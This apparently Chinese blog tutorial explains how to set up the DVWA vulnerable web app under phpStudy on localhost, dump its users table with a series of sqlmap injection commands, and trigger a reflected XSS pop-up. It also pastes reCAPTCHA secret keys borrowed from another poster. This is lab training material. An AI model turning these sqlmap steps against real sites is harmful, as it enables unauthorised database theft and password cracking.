phpstudy配置dvwa——sql注入、xss攻击练习

phpstudy配置dvwa

首先进入网站下载phpstudy:https://www.xp.cn/download.html

安装完成后下载DVWA:https://dvwa.co.uk/,将DVWA解压在phpstudy目录下的WWW目录,然后将文件夹命名为DVWA,然后进入DVWA\config目录,更改配置文件为config.inc.php

在这里插入图片描述

编辑 dvwa/config/config.inc.php这个配置文件

$_DVWA[ ‘recaptcha_public_key’ ] = ‘’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘’;

key可以自己生成,地址是
https://www.google.com/recaptcha/admin/create

借用一下别人生成的

Site key:
6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb

Secret key:
6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K

把key填上就行了

$_DVWA[ ‘recaptcha_public_key’ ] = ‘6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb’;
$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K’;
原文链接:https://blog.csdn.net/RBPicsdn/article/details/80059132

然后进入phpstudy目录下的Extensions\php\php7.3.4nts目录,编辑php.ini,ctrl+F搜索allow_

在这里插入图片描述

保存退出,打开phpstudy
在这里插入图片描述

进入http://127.0.0.1/DVWA/setup.php,创建一下。然后登陆,登录账号名称为admin password

sql注入练习

安装sqlmap:http://sqlmap.org/ python环境:https://www.python.org/downloads/

登录后选择SQL Injection板块,F12-network,随便提交一个数据,进行抓取cookie

在这里插入图片描述

将cookie复制下来,然后cmd进入sqlmap文件夹下,输入:

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" --dbs

然后一路y同意,即可检索出数据库。

在这里插入图片描述

爆表名

因为我们是dvwa,所以数据库名选择dvwa,然后爆dvwa的表名

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa --tables

在这里插入图片描述

我们肯定是对users感兴趣啊,要的就是账号和密码,所以接下来爆users中的列名

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users --columns

得到列名如下,我们感兴趣的是user和password:

在这里插入图片描述

爆账号和密码

接下来就是爆user和password中的数据了,这里我想说的是,你可以在爆数据的时候直接MD5解密,到时候会有选项提示,问你是否用kali中自带的字典进行解密

sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie "security=low; PHPSESSID=d24irf2jas287lkua6k4to98mb" -D dvwa -T users -C user,password --dump

最终得到账号和密码,达到目的

在这里插入图片描述

xss攻击dvwa

调成low难度后,在xss(reflected)里,输入什么返回什么,而GET传参,未出现明显的过滤,输入提交后有明显弹窗。

在这里插入图片描述

更多请参考:https://blog.csdn.net/h1012946585/article/details/82500018

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页